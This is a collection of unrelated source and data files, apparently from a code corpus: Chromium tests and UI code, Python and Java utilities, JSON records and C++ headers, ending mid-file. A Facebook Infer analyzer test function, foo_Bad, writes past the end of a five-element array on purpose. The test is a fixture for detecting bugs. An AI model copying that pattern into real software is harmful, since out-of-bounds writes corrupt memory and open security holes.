scoped_refptr<network::WeakWrapperSharedURLLoaderFactory> test_shared_loader_factory_; base::FilePath test_dir_; scoped_refptr<DeviceLocalAccountExternalPolicyLoader> loader_; MockExternalPolicyProviderVisitor visitor_; std::unique_ptr<extensions::ExternalProviderImpl> provider_; content::InProcessUtilityThreadHelper in_process_utility_thread_helper_; #if BUILDFLAG(IS_CHROMEOS_ASH) ash::ScopedCrosSettingsTestHelper cros_settings_test_helper_; #endif // BUILDFLAG(IS_CHROMEOS_ASH) }; DeviceLocalAccountExternalPolicyLoaderTest:: DeviceLocalAccountExternalPolicyLoaderTest() : task_environment_(content::BrowserTaskEnvironment::IO_MAINLOOP), test_shared_loader_factory_( base::MakeRefCounted<network::WeakWrapperSharedURLLoaderFactory>( &test_url_loader_factory_)) {} DeviceLocalAccountExternalPolicyLoaderTest:: ~DeviceLocalAccountExternalPolicyLoaderTest() { } void 
DeviceLocalAccountExternalPolicyLoaderTest::SetUp() { profile_ = std::make_unique<TestingProfile>(); ASSERT_TRUE(temp_dir_.CreateUniqueTempDir()); cache_dir_ = temp_dir_.GetPath().Append(kCacheDir); ASSERT_TRUE(base::CreateDirectoryAndGetError(cache_dir_, NULL)); TestingBrowserProcess::GetGlobal()->SetSharedURLLoaderFactory( test_shared_loader_factory_); ASSERT_TRUE(base::PathService::Get(chrome::DIR_TEST_DATA, &test_dir_)); loader_ = new DeviceLocalAccountExternalPolicyLoader(&store_, cache_dir_); provider_.reset(new extensions::ExternalProviderImpl( &visitor_, loader_, profile_.get(), ManifestLocation::kExternalPolicy, ManifestLocation::kExternalPolicyDownload, extensions::Extension::NO_FLAGS)); VerifyAndResetVisitorCallExpectations(); } void DeviceLocalAccountExternalPolicyLoaderTest::TearDown() { TestingBrowserProcess::GetGlobal()->SetSharedURLLoaderFactory(nullptr); } void DeviceLocalAccountExternalPolicyLoaderTest:: VerifyAndResetVisitorCallExpectations() { Mock::VerifyAndClearExpectations(&visitor_); EXPECT_CALL(visitor_, OnExternalExtensionFileFound(_)).Times(0); EXPECT_CALL(visitor_, OnExternalExtensionUpdateUrlFound(_, _)).Times(0); EXPECT_CALL(visitor_, OnExternalProviderReady(_)) .Times(0); EXPECT_CALL(visitor_, OnExternalProviderUpdateComplete(_, _, _, _)).Times(0); } void DeviceLocalAccountExternalPolicyLoaderTest::SetForceInstallListPolicy() { base::Value forcelist(base::Value::Type::LIST); forcelist.Append("invalid"); forcelist.Append(base::StringPrintf( "%s;%s", kExtensionId, extension_urls::GetWebstoreUpdateUrl().spec().c_str())); store_.policy_map_.Set(policy::key::kExtensionInstallForcelist, policy::POLICY_LEVEL_MANDATORY, policy::POLICY_SCOPE_USER, policy::POLICY_SOURCE_CLOUD, std::move(forcelist), nullptr); store_.NotifyStoreLoaded(); } // Verifies that when the cache is not explicitly started, the loader does not // serve any extensions, even if the force-install list policy is set or a load // is manually requested. TEST_F(DeviceLocalAccountExternalPolicyLoaderTest, CacheNotStarted) { // Set the force-install list policy. SetForceInstallListPolicy(); // Manually request a load. loader_->StartLoading(); EXPECT_FALSE(loader_->IsCacheRunning()); } // Verifies that the cache can be started and stopped correctly. TEST_F(DeviceLocalAccountExternalPolicyLoaderTest, ForceInstallListEmpty) { // Set an empty force-install list policy. store_.NotifyStoreLoaded(); // Start the cache. Verify that the loader announces an empty extension list. EXPECT_CALL(visitor_, OnExternalProviderReady(provider_.get())) .Times(1); loader_->StartCache(base::ThreadTaskRunnerHandle::Get()); base::RunLoop().RunUntilIdle(); VerifyAndResetVisitorCallExpectations(); // Stop the cache. Verify that the loader announces an empty extension list. EXPECT_CALL(visitor_, OnExternalProviderReady(provider_.get())) .Times(1); base::RunLoop run_loop; loader_->StopCache(run_loop.QuitClosure()); VerifyAndResetVisitorCallExpectations(); // Spin the loop until the cache shutdown callback is invoked. Verify that at // that point, no further file I/O tasks are pending. run_loop.Run(); EXPECT_TRUE(base::CurrentThread::Get()->IsIdleForTesting()); } // Verifies that when a force-install list policy referencing an extension is // set and the cache is started, the loader downloads, caches and serves the // extension. TEST_F(DeviceLocalAccountExternalPolicyLoaderTest, ForceInstallListSet) { // Set a force-install list policy that contains an invalid entry (which // should be ignored) and a valid reference to an extension. 
SetForceInstallListPolicy(); // Start the cache. auto cache_task_runner = base::MakeRefCounted<TrackingProxyTaskRunner>( base::ThreadTaskRunnerHandle::Get()); loader_->StartCache(cache_task_runner); // Spin the loop, allowing the loader to process the force-install list. // Verify that the loader announces an empty extension list. EXPECT_CALL(visitor_, OnExternalProviderReady(provider_.get())) .Times(1); base::RunLoop().RunUntilIdle(); // Verify that a downloader has started and is attempting to download an // update manifest. EXPECT_EQ(1, test_url_loader_factory_.NumPending()); // Return a manifest to the downloader. std::string manifest; EXPECT_TRUE(base::ReadFileToString(test_dir_.Append(kExtensionUpdateManifest), &manifest)); auto* pending_request = test_url_loader_factory_.GetPendingRequest(0); test_url_loader_factory_.AddResponse(pending_request->request.url.spec(), manifest); // Wait for the manifest to be parsed. content::WindowedNotificationObserver( extensions::NOTIFICATION_EXTENSION_UPDATE_FOUND, content::NotificationService::AllSources()).Wait(); // Verify that the downloader is attempting to download a CRX file. EXPECT_EQ(1, test_url_loader_factory_.NumPending()); // Trigger downloading of the temporary CRX file. pending_request = test_url_loader_factory_.GetPendingRequest(0); test_url_loader_factory_.AddResponse(pending_request->request.url.spec(), "Content is irrelevant."); // Spin the loop. Verify that the loader announces the presence of a new CRX // file, served from the cache directory. const base::FilePath cached_crx_path = cache_dir_.Append(base::StringPrintf( "%s-%s.crx", kExtensionId, kExtensionCRXVersion)); base::RunLoop cache_run_loop; EXPECT_CALL( visitor_, OnExternalExtensionFileFound(AllOf( Field(&extensions::ExternalInstallInfoFile::extension_id, StrEq(kExtensionId)), Field(&extensions::ExternalInstallInfoFile::path, cached_crx_path), Field(&extensions::ExternalInstallInfoFile::crx_location, ManifestLocation::kExternalPolicy)))); EXPECT_CALL(visitor_, OnExternalProviderReady(provider_.get())) .Times(1) .WillOnce(InvokeWithoutArgs(&cache_run_loop, &base::RunLoop::Quit)); cache_run_loop.Run(); VerifyAndResetVisitorCallExpectations(); // Stop the cache. Verify that the loader announces an empty extension list. EXPECT_CALL(visitor_, OnExternalProviderReady(provider_.get())) .Times(1); base::RunLoop shutdown_run_loop; loader_->StopCache(shutdown_run_loop.QuitClosure()); VerifyAndResetVisitorCallExpectations(); // Spin the loop until the cache shutdown callback is invoked. Verify that at // that point, no further file I/O tasks are pending. shutdown_run_loop.Run(); EXPECT_FALSE(cache_task_runner->has_pending_tasks()); } } // namespace chromeos
<reponame>zipated/src // Copyright 2018 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "chrome/browser/ui/webui/chromeos/assistant_optin/assistant_optin_ui.h" #include <memory> #include "base/bind.h" #include "base/macros.h" #include "chrome/browser/profiles/profile.h" #include "chrome/browser/profiles/profile_manager.h" #include "chrome/browser/ui/webui/chromeos/assistant_optin/value_prop_screen_handler.h" #include "chrome/browser/ui/webui/chromeos/login/base_screen_handler.h" #include "chrome/common/url_constants.h" #include "chrome/grit/browser_resources.h" #include "chromeos/services/assistant/public/mojom/constants.mojom.h" #include "chromeos/services/assistant/public/proto/settings_ui.pb.h" #include "components/arc/arc_prefs.h" #include "components/prefs/pref_service.h" #include "content/public/browser/web_ui.h" #include "content/public/browser/web_ui_data_source.h" #include "services/service_manager/public/cpp/connector.h" namespace chromeos { namespace { bool is_active = false; constexpr int kAssistantOptInDialogWidth = 576; constexpr int kAssistantOptInDialogHeight = 480; // Construct SettingsUiSelector for the ConsentFlow UI. assistant::SettingsUiSelector GetSettingsUiSelector() { assistant::SettingsUiSelector selector; assistant::ConsentFlowUiSelector* consent_flow_ui = selector.mutable_consent_flow_ui_selector(); consent_flow_ui->set_flow_id(assistant::ActivityControlSettingsUiSelector:: ASSISTANT_SUW_ONBOARDING_ON_CHROME_OS); return selector; } // Construct SettingsUiUpdate for user opt-in. assistant::SettingsUiUpdate GetSettingsUiUpdate( const std::string& consent_token) { assistant::SettingsUiUpdate update; assistant::ConsentFlowUiUpdate* consent_flow_update = update.mutable_consent_flow_ui_update(); consent_flow_update->set_flow_id( assistant::ActivityControlSettingsUiSelector:: ASSISTANT_SUW_ONBOARDING_ON_CHROME_OS); consent_flow_update->set_consent_token(consent_token); return update; } } // namespace AssistantOptInUI::AssistantOptInUI(content::WebUI* web_ui) : ui::WebDialogUI(web_ui), weak_factory_(this) { // Set up the chrome://assistant-optin source. 
content::WebUIDataSource* source = content::WebUIDataSource::Create(chrome::kChromeUIAssistantOptInHost); js_calls_container_ = std::make_unique<JSCallsContainer>(); auto base_handler = std::make_unique<AssistantOptInHandler>(js_calls_container_.get()); assistant_handler_ = base_handler.get(); AddScreenHandler(std::move(base_handler)); AddScreenHandler(std::make_unique<ValuePropScreenHandler>( base::BindOnce(&AssistantOptInUI::OnExit, weak_factory_.GetWeakPtr()))); base::DictionaryValue localized_strings; for (auto* handler : screen_handlers_) handler->GetLocalizedStrings(&localized_strings); source->AddLocalizedStrings(localized_strings); source->SetJsonPath("strings.js"); source->AddResourcePath("assistant_optin.js", IDR_ASSISTANT_OPTIN_JS); source->SetDefaultResource(IDR_ASSISTANT_OPTIN_HTML); content::WebUIDataSource::Add(Profile::FromWebUI(web_ui), source); if (arc::VoiceInteractionControllerClient::Get()->voice_interaction_state() != ash::mojom::VoiceInteractionState::RUNNING) { arc::VoiceInteractionControllerClient::Get()->AddObserver(this); } else { Initialize(); } } AssistantOptInUI::~AssistantOptInUI() { arc::VoiceInteractionControllerClient::Get()->RemoveObserver(this); } void AssistantOptInUI::OnStateChanged(ash::mojom::VoiceInteractionState state) { if (state == ash::mojom::VoiceInteractionState::RUNNING) Initialize(); } void AssistantOptInUI::Initialize() { if (settings_manager_.is_bound()) return; // Set up settings mojom. Profile* const profile = Profile::FromWebUI(web_ui()); service_manager::Connector* connector = content::BrowserContext::GetConnectorFor(profile); connector->BindInterface(assistant::mojom::kServiceName, mojo::MakeRequest(&settings_manager_)); // Send GetSettings request for the ConsentFlow UI. assistant::SettingsUiSelector selector = GetSettingsUiSelector(); settings_manager_->GetSettings( selector.SerializeAsString(), base::BindOnce(&AssistantOptInUI::OnGetSettingsResponse, weak_factory_.GetWeakPtr())); } void AssistantOptInUI::AddScreenHandler( std::unique_ptr<BaseWebUIHandler> handler) { screen_handlers_.push_back(handler.get()); web_ui()->AddMessageHandler(std::move(handler)); } void AssistantOptInUI::OnExit(AssistantOptInScreenExitCode exit_code) { PrefService* prefs = Profile::FromWebUI(web_ui())->GetPrefs(); switch (exit_code) { case AssistantOptInScreenExitCode::VALUE_PROP_SKIPPED: prefs->SetBoolean(arc::prefs::kArcVoiceInteractionValuePropAccepted, false); prefs->SetBoolean(arc::prefs::kVoiceInteractionEnabled, false); CloseDialog(nullptr); break; case AssistantOptInScreenExitCode::VALUE_PROP_ACCEPTED: // Send the update to complete user opt-in. settings_manager_->UpdateSettings( GetSettingsUiUpdate(consent_token_).SerializeAsString(), base::BindOnce(&AssistantOptInUI::OnUpdateSettingsResponse, weak_factory_.GetWeakPtr())); break; default: NOTREACHED(); } } void AssistantOptInUI::OnGetSettingsResponse(const std::string& settings) { assistant::SettingsUi settings_ui; assistant::ConsentFlowUi::ConsentUi::ActivityControlUi activity_control_ui; settings_ui.ParseFromString(settings); DCHECK(settings_ui.has_consent_flow_ui()); activity_control_ui = settings_ui.consent_flow_ui().consent_ui().activity_control_ui(); consent_token_ = activity_control_ui.consent_token(); base::ListValue zippy_data; if (activity_control_ui.setting_zippy().size() == 0) { // No need to consent. Close the dialog for now. 
CloseDialog(nullptr); return; } for (auto& setting_zippy : activity_control_ui.setting_zippy()) { base::DictionaryValue data; data.SetString("title", setting_zippy.title()); data.SetString("description", setting_zippy.description_paragraph(0)); data.SetString("additionalInfo", setting_zippy.additional_info_paragraph(0)); data.SetString("iconUri", setting_zippy.icon_uri()); zippy_data.GetList().push_back(std::move(data)); } assistant_handler_->AddSettingZippy(zippy_data); base::DictionaryValue dictionary; dictionary.SetString("valuePropIntro", activity_control_ui.intro_text_paragraph(0)); dictionary.SetString("valuePropIdentity", activity_control_ui.identity()); dictionary.SetString("valuePropFooter", activity_control_ui.footer_paragraph(0)); dictionary.SetString( "valuePropNextButton", settings_ui.consent_flow_ui().consent_ui().accept_button_text()); dictionary.SetString( "valuePropSkipButton", settings_ui.consent_flow_ui().consent_ui().reject_button_text()); assistant_handler_->ReloadContent(dictionary); } void AssistantOptInUI::OnUpdateSettingsResponse(const std::string& result) { assistant::SettingsUiUpdateResult ui_result; ui_result.ParseFromString(result); DCHECK(ui_result.has_consent_flow_update_result()); if (ui_result.consent_flow_update_result().update_status() != assistant::ConsentFlowUiUpdateResult::SUCCESS) { // TODO(updowndta): Handle consent update failure. LOG(ERROR) << "Consent udpate error."; } // More screens to be added. Close the dialog for now. PrefService* prefs = Profile::FromWebUI(web_ui())->GetPrefs(); prefs->SetBoolean(arc::prefs::kArcVoiceInteractionValuePropAccepted, true); prefs->SetBoolean(arc::prefs::kVoiceInteractionEnabled, true); CloseDialog(nullptr); } // AssistantOptInDialog // static void AssistantOptInDialog::Show() { DCHECK(!is_active); AssistantOptInDialog* dialog = new AssistantOptInDialog(); dialog->ShowSystemDialog(true); } // static bool AssistantOptInDialog::IsActive() { return is_active; } AssistantOptInDialog::AssistantOptInDialog() : SystemWebDialogDelegate(GURL(chrome::kChromeUIAssistantOptInURL), base::string16()) { DCHECK(!is_active); is_active = true; } AssistantOptInDialog::~AssistantOptInDialog() { is_active = false; } void AssistantOptInDialog::GetDialogSize(gfx::Size* size) const { size->SetSize(kAssistantOptInDialogWidth, kAssistantOptInDialogHeight); } std::string AssistantOptInDialog::GetDialogArgs() const { return std::string(); } bool AssistantOptInDialog::ShouldShowDialogTitle() const { return false; } } // namespace chromeos
# This sample tests the provision in PEP 544 where a class type can # be assigned to a protocol. from typing import Any, Protocol class ProtoA(Protocol): def meth(_self, x: int) -> int: ... class ProtoB(Protocol): def meth(_self, self: Any, x: int) -> int: ... class C: def meth(self, x: int) -> int: ... # This should generate an error because C.meth isn't compatible # with ProtoA().meth. a: ProtoA = C b: ProtoB = C class ProtoD(Protocol): var1: int @property def var2(self) -> str: ... class E: var1: int var2: str class F: var1: int var2: int d: ProtoD = E # This should generate an error because var2 is the wrong type. e: ProtoD = F class Jumps(Protocol): def jump(self) -> int: ... class Jumper1: @classmethod def jump(cls) -> int: ... class Jumper2: def jump(self) -> int: ... def do_jump(j: Jumps): print(j.jump()) do_jump(Jumper1) do_jump(Jumper2())
# ------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # -------------------------------------------------------------------------- import inspect import pytest import functools from threading import Event from azure.iot.device.common import handle_exceptions from azure.iot.device.common.pipeline import ( pipeline_events_base, pipeline_ops_base, pipeline_stages_base, pipeline_events_mqtt, pipeline_ops_mqtt, config, ) try: from inspect import getfullargspec as getargspec except ImportError: from inspect import getargspec class StageRunOpTestBase(object): """All PipelineStage .run_op() tests should inherit from this base class. It provides basic tests for dealing with exceptions. """ @pytest.mark.it( "Completes the operation with failure if an unexpected Exception is raised while executing the operation" ) def test_completes_operation_with_error(self, mocker, stage, op, arbitrary_exception): stage._run_op = mocker.MagicMock(side_effect=arbitrary_exception) stage.run_op(op) assert op.completed assert op.error is arbitrary_exception @pytest.mark.it( "Allows any BaseException that was raised during execution of the operation to propogate" ) def test_base_exception_propogates(self, mocker, stage, op, arbitrary_base_exception): stage._run_op = mocker.MagicMock(side_effect=arbitrary_base_exception) with pytest.raises(arbitrary_base_exception.__class__) as e_info: stage.run_op(op) assert e_info.value is arbitrary_base_exception class StageHandlePipelineEventTestBase(object): """All PipelineStage .handle_pipeline_event() tests should inherit from this base class. It provides basic tests for dealing with exceptions. """ @pytest.mark.it( "Sends any unexpected Exceptions raised during handling of the event to the background exception handler" ) def test_uses_background_exception_handler(self, mocker, stage, event, arbitrary_exception): stage._handle_pipeline_event = mocker.MagicMock(side_effect=arbitrary_exception) mocker.spy(handle_exceptions, "handle_background_exception") stage.handle_pipeline_event(event) assert handle_exceptions.handle_background_exception.call_count == 1 assert handle_exceptions.handle_background_exception.call_args == mocker.call( arbitrary_exception ) @pytest.mark.it("Allows any BaseException raised during handling of the event to propogate") def test_base_exception_propogates(self, mocker, stage, event, arbitrary_base_exception): stage._handle_pipeline_event = mocker.MagicMock(side_effect=arbitrary_base_exception) with pytest.raises(arbitrary_base_exception.__class__) as e_info: stage.handle_pipeline_event(event) assert e_info.value is arbitrary_base_exception
package rlbot.gamestate; import com.google.flatbuffers.FlatBufferBuilder; import rlbot.flat.DesiredPhysics; import rlbot.vector.Vector3; /** * See https://github.com/RLBot/RLBotJavaExample/wiki/Manipulating-Game-State */ public class PhysicsState { private DesiredVector3 location; private DesiredRotation rotation; private DesiredVector3 velocity; private DesiredVector3 angularVelocity; public PhysicsState() { } public PhysicsState(DesiredVector3 location, DesiredRotation rotation, DesiredVector3 velocity, DesiredVector3 angularVelocity) { this.location = location; this.rotation = rotation; this.velocity = velocity; this.angularVelocity = angularVelocity; } public DesiredVector3 getLocation() { return location; } public PhysicsState withLocation(DesiredVector3 location) { this.location = location; return this; } public DesiredRotation getRotation() { return rotation; } public PhysicsState withRotation(DesiredRotation rotation) { this.rotation = rotation; return this; } public DesiredVector3 getVelocity() { return velocity; } public PhysicsState withVelocity(DesiredVector3 velocity) { this.velocity = velocity; return this; } public DesiredVector3 getAngularVelocity() { return angularVelocity; } public PhysicsState withAngularVelocity(DesiredVector3 angularVelocity) { this.angularVelocity = angularVelocity; return this; } public int toFlatbuffer(FlatBufferBuilder builder) { Integer locationOffset = location == null ? null : location.toFlatbuffer(builder); Integer rotationOffset = rotation == null ? null : rotation.toFlatbuffer(builder); Integer velocityOffset = velocity == null ? null : velocity.toFlatbuffer(builder); Integer angularVelocityOffset = angularVelocity == null ? null : angularVelocity.toFlatbuffer(builder); DesiredPhysics.startDesiredPhysics(builder); if (locationOffset != null) { DesiredPhysics.addLocation(builder, locationOffset); } if (rotationOffset != null) { DesiredPhysics.addRotation(builder, rotationOffset); } if (velocityOffset != null) { DesiredPhysics.addVelocity(builder, velocityOffset); } if (angularVelocityOffset != null) { DesiredPhysics.addAngularVelocity(builder, angularVelocityOffset); } return DesiredPhysics.endDesiredPhysics(builder); } }
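/*
 * Usage sketch (illustrative only): the fluent with* setters let callers describe
 * only the physics fields they want to override; toFlatbuffer() skips any field
 * left null, so unset properties keep their current in-game values. The
 * DesiredVector3 construction below is assumed to follow the same fluent style
 * and may need adjusting to the real constructors.
 *
 *   PhysicsState state = new PhysicsState()
 *           .withLocation(new DesiredVector3().withZ(200f))
 *           .withVelocity(new DesiredVector3().withX(0f).withY(0f).withZ(-500f));
 */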
{"nom":"Fontenois-lès-Montbozon","dpt":"Haute-Saône","inscrits":212,"abs":28,"votants":184,"blancs":6,"nuls":18,"exp":160,"res":[{"panneau":"1","voix":82},{"panneau":"2","voix":78}]}
// Copyright (c) 2012 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef CHROME_TEST_CHROMEDRIVER_CHROME_CHROME_IMPL_H_ #define CHROME_TEST_CHROMEDRIVER_CHROME_CHROME_IMPL_H_ #include <list> #include <memory> #include <string> #include "base/compiler_specific.h" #include "base/memory/linked_ptr.h" #include "base/memory/scoped_vector.h" #include "chrome/test/chromedriver/chrome/chrome.h" struct BrowserInfo; class DevToolsClient; class DevToolsEventListener; class DevToolsHttpClient; class PortReservation; class Status; class WebView; class WebViewImpl; class WebViewsInfo; class ChromeImpl : public Chrome { public: ~ChromeImpl() override; // Overridden from Chrome: Status GetAsDesktop(ChromeDesktopImpl** desktop) override; const BrowserInfo* GetBrowserInfo() const override; bool HasCrashedWebView() override; Status GetWebViewIdForFirstTab(std::string* web_view_id, bool w3c_complaint) override; Status GetWebViewIds(std::list<std::string>* web_view_ids, bool w3c_compliant) override; Status GetWebViewById(const std::string& id, WebView** web_view) override; Status CloseWebView(const std::string& id) override; Status ActivateWebView(const std::string& id) override; bool IsMobileEmulationEnabled() const override; bool HasTouchScreen() const override; std::string page_load_strategy() const override; Status Quit() override; protected: ChromeImpl(std::unique_ptr<DevToolsHttpClient> http_client, std::unique_ptr<DevToolsClient> websocket_client, ScopedVector<DevToolsEventListener>& devtools_event_listeners, std::unique_ptr<PortReservation> port_reservation, std::string page_load_strategy); virtual Status QuitImpl() = 0; bool quit_; std::unique_ptr<DevToolsHttpClient> devtools_http_client_; std::unique_ptr<DevToolsClient> devtools_websocket_client_; private: typedef std::list<linked_ptr<WebViewImpl> > WebViewList; void UpdateWebViews(const WebViewsInfo& views_info, bool w3c_compliant); // Web views in this list are in the same order as they are opened. WebViewList web_views_; ScopedVector<DevToolsEventListener> devtools_event_listeners_; std::unique_ptr<PortReservation> port_reservation_; std::string page_load_strategy_; }; #endif // CHROME_TEST_CHROMEDRIVER_CHROME_CHROME_IMPL_H_
/*
 * Copyright (c) Facebook, Inc. and its affiliates.
 *
 * This source code is licensed under the MIT license found in the
 * LICENSE file in the root directory of this source tree.
 */
#include <atomic>
#include <vector>

struct S {
  std::vector<int> l;
  S* next;
  std::atomic<void*> ptr;
};

class C {
  void foo_Bad();
  void goo();
  S head_;
};

void C::foo_Bad() {
  while (1) {
    S* t = head_.next;
    int x = t->l.size();
    void* ptr = t->ptr;
    int a[5];
    a[10] = 1;
  }
}

void C::goo() {
  while (1) {
    S* t = head_.next;
    int x = t->l.size();
    void* ptr = t->ptr;
  }
}
<filename>src/Native/FastTreeNative/SumupSegment.h //------------------------------------------------------------------------------ // <copyright company="Microsoft Corporation"> // Copyright (c) Microsoft Corporation. All rights reserved. // </copyright> //------------------------------------------------------------------------------ template<class FloatT, class FloatT2> void SumupSegment_noindices(_In_ uint32_t* pData, _In_ uint8_t* pSegType, _In_ int32_t* pSegLength, _In_reads_(origSampleSize) FloatT* pSampleOutputs, #ifdef IsWeighted _In_reads_(origSampleSize) FloatT2* pSampleOutputWeights, #endif _Inout_ FloatT* pSumOutputsByBin, #ifdef IsWeighted _Inout_ FloatT2* pSumWeightsByBin, #endif _Inout_ int32_t* pCountByBin, _In_ int32_t origSampleSize) { // Sumup over all values. uint64_t workingBits = pData[0] | ((uint64_t)pData[1] << 32); int bitsOffset = 0; pData += 2; FloatT* pSampleEnd = pSampleOutputs + origSampleSize; while (pSampleOutputs < pSampleEnd) { int32_t segEnd = *(pSegLength++); int8_t segType = *(pSegType++); uint32_t mask = ~((-1) << segType); while (segEnd-- > 0) { int32_t featureBin = (int32_t)((workingBits >> bitsOffset)&mask); pSumOutputsByBin[featureBin] += *(pSampleOutputs++); #ifdef IsWeighted pSumWeightsByBin[featureBin] += *(pSampleOutputWeights++); #endif pCountByBin[featureBin]++; bitsOffset += segType; if (bitsOffset >= 32) { workingBits = (workingBits >> 32) | (((uint64_t)*(pData++)) << 32); bitsOffset &= 31; } } } } template<class FloatT, class FloatT2> void SumupSegment(_In_ uint32_t* pData, _In_ uint8_t* pSegType, _In_ int32_t* pSegLength, _In_reads_(origSampleSize) int32_t* pIndices, _In_reads_(origSampleSize) FloatT* pSampleOutputs, #ifdef IsWeighted _In_reads_(origSampleSize) FloatT2* pSampleOutputWeights, #endif _Inout_ FloatT* pSumOutputsByBin, #ifdef IsWeighted _Inout_ FloatT2* pSumWeightsByBin, #endif _Inout_ int32_t* pCountByBin, _In_ int32_t origSampleSize) { if (pIndices == nullptr) { SumupSegment_noindices<FloatT, double> #ifdef IsWeighted (pData, pSegType, pSegLength, pSampleOutputs, pSampleOutputWeights, pSumOutputsByBin, pSumWeightsByBin, pCountByBin, origSampleSize); #else (pData, pSegType, pSegLength, pSampleOutputs, pSumOutputsByBin, pCountByBin, origSampleSize); #endif return; } int64_t globalBitOffset = 0; int32_t currIndex = 0, segEnd = *(pSegLength++); int32_t nextIndex = segEnd; int8_t segType = *(pSegType++); uint32_t mask = ~((-1) << segType); FloatT* pSampleEnd = pSampleOutputs + origSampleSize; while (pSampleOutputs < pSampleEnd) { int index = *(pIndices++); while (index >= nextIndex) { globalBitOffset += __emulu((unsigned int)segEnd, (unsigned int)segType); currIndex = nextIndex; nextIndex += (segEnd = *(pSegLength++)); mask = ~((-1) << (segType = *(pSegType++))); } int64_t bitOffset = globalBitOffset + __emul(index - currIndex, (int)segType); int32_t major = (int32_t)(bitOffset >> 5), minor = (int32_t)(bitOffset & 0x1f); int32_t featureBin = (((uint64_t)pData[major] >> minor) | ((uint64_t)pData[major + 1] << (32 - minor)))&mask; pSumOutputsByBin[featureBin] += *(pSampleOutputs++); #ifdef IsWeighted pSumWeightsByBin[featureBin] += *(pSampleOutputWeights++); #endif pCountByBin[featureBin]++; } }
/*
** 2011 April 5
**
** The author disclaims copyright to this source code. In place of
** a legal notice, here is a blessing:
**    May you do good and not evil.
**    May you find forgiveness for yourself and forgive others.
**    May you share freely, never taking more than you give.
*/
package info.ata4.bsplib.struct;

import info.ata4.bsplib.vector.Vector3f;
import info.ata4.io.DataReader;
import info.ata4.io.DataWriter;
import java.io.IOException;

/**
 * Overlay data structure.
 *
 * @author <NAME> <barracuda415 at yahoo.de>
 */
public class DOverlay implements DStruct {

    public static final int OVERLAY_BSP_FACE_COUNT = 64;
    public static final int OVERLAY_RENDER_ORDER_NUM_BITS = 2;
    public static final int OVERLAY_RENDER_ORDER_MASK = 0xC000; // top 2 bits set

    public int id;
    public short texinfo;
    public int faceCountAndRenderOrder;
    public int[] ofaces = new int[OVERLAY_BSP_FACE_COUNT];
    public float[] u = new float[2];
    public float[] v = new float[2];
    public Vector3f[] uvpoints = new Vector3f[4];
    public Vector3f origin;
    public Vector3f basisNormal;

    public int getFaceCount() {
        return faceCountAndRenderOrder & ~OVERLAY_RENDER_ORDER_MASK;
    }

    public int getRenderOrder() {
        return faceCountAndRenderOrder >> (16 - OVERLAY_RENDER_ORDER_NUM_BITS);
    }

    @Override
    public int getSize() {
        return 352;
    }

    @Override
    public void read(DataReader in) throws IOException {
        id = in.readInt();
        texinfo = in.readShort();
        faceCountAndRenderOrder = in.readUnsignedShort();

        for (int j = 0; j < OVERLAY_BSP_FACE_COUNT; j++) {
            ofaces[j] = in.readInt();
        }

        u[0] = in.readFloat();
        u[1] = in.readFloat();
        v[0] = in.readFloat();
        v[1] = in.readFloat();

        for (int j = 0; j < 4; j++) {
            uvpoints[j] = Vector3f.read(in);
        }

        origin = Vector3f.read(in);
        basisNormal = Vector3f.read(in);
    }

    @Override
    public void write(DataWriter out) throws IOException {
        out.writeInt(id);
        out.writeShort(texinfo);
        out.writeUnsignedShort(faceCountAndRenderOrder);

        for (int j = 0; j < OVERLAY_BSP_FACE_COUNT; j++) {
            out.writeInt(ofaces[j]);
        }

        out.writeFloat(u[0]);
        out.writeFloat(u[1]);
        out.writeFloat(v[0]);
        out.writeFloat(v[1]);

        // Mirror read(): write the four UV points, then origin and basis normal.
        for (int j = 0; j < 4; j++) {
            Vector3f.write(out, uvpoints[j]);
        }

        Vector3f.write(out, origin);
        Vector3f.write(out, basisNormal);
    }
}
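/*
 * Worked example (illustrative only): faceCountAndRenderOrder packs both values
 * into one 16-bit field, with the render order in the top two bits.
 *
 *   faceCountAndRenderOrder = 0x8003
 *   getFaceCount()   = 0x8003 & ~0xC000 = 3   (low 14 bits)
 *   getRenderOrder() = 0x8003 >> 14     = 2   (top 2 bits)
 */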
<reponame>dchain01/token-profile { "symbol": "ST", "address": "0x744E098e9d3FA11D96C2860B49D33f46dd2Ae167", "overview": { "en": "StatEX is a comprehensive service platform that integrates transaction, storage and financial management. It provides spot and derivative trading services for digital assets such as Bitcoin and ETF to users around the world. The aim is to construct a decentralized business ecosystem, connecting the value of digital assets and real business, connecting the various ecological chains, perfectly combining offline experiential services with block chain Internet finance, and realizing the block chain transformation of business services for the vast number of users.", "zh": "StatEX是一个集交易、存储以及理财为一体的综合性服务平台,向全球用户提供比特币、以太坊等数字资产的现货和衍生品交易服务。旨在构建一个去中心化的商业生态圈,通过打通数字资产与实体商业的价值对接,连接各生态链,将线下体验式服务与区块链互联网金融完美结合,为广大用户实现商业服务的区块链转型。" }, "email": "<EMAIL>", "website": "http://statex.co", "whitepaper": "https://s3-ap-southeast-1.amazonaws.com/statex/whitepaper.pdf", "state": "NORMAL", "published_on": "2019-01-30", "initial_price": { "ETH": "0.0005 ETH", "USD": "0.07142 USD" } }
/* Copyright © 2020 Apple Inc. All rights reserved. * * Use of this source code is governed by a BSD-3-clause license that can * be found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause */ #pragma once #if __cplusplus > 201103L #include <experimental/type_traits> #else // this is a C++11 implementation for std::experimental::detail (see online cppreference // for full details). // // this enables static interface testing for the presence of functions and methods. // // impl reference: https://people.eecs.berkeley.edu/~brock/blog/detection_idiom.php namespace std { template <class...> using void_t = void; namespace experimental { struct nonesuch { ~nonesuch() = delete; nonesuch(nonesuch const&) = delete; void operator=(nonesuch const&) = delete; }; namespace detail { template <class Default, class AlwaysVoid, template <class...> class Op, class... Args> struct detector { using value_t = std::false_type; using type = Default; }; template <class Default, template <class...> class Op, class... Args> struct detector<Default, std::void_t<Op<Args...> >, Op, Args...> { using value_t = std::true_type; using type = Op<Args...>; }; } // namespace detail template <template <class...> class Op, class... Args> using is_detected = typename detail::detector<nonesuch, void, Op, Args...>::value_t; } // namespace experimental } // namespace std #endif
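
// Usage sketch (illustrative only): the detection idiom probes for a member at
// compile time without triggering a hard error. For example, to detect whether a
// type has a resize(size_t) member (requires <utility>, <cstddef> and, for the
// example instantiations, <vector>):
//
//   template <class T>
//   using resize_op =
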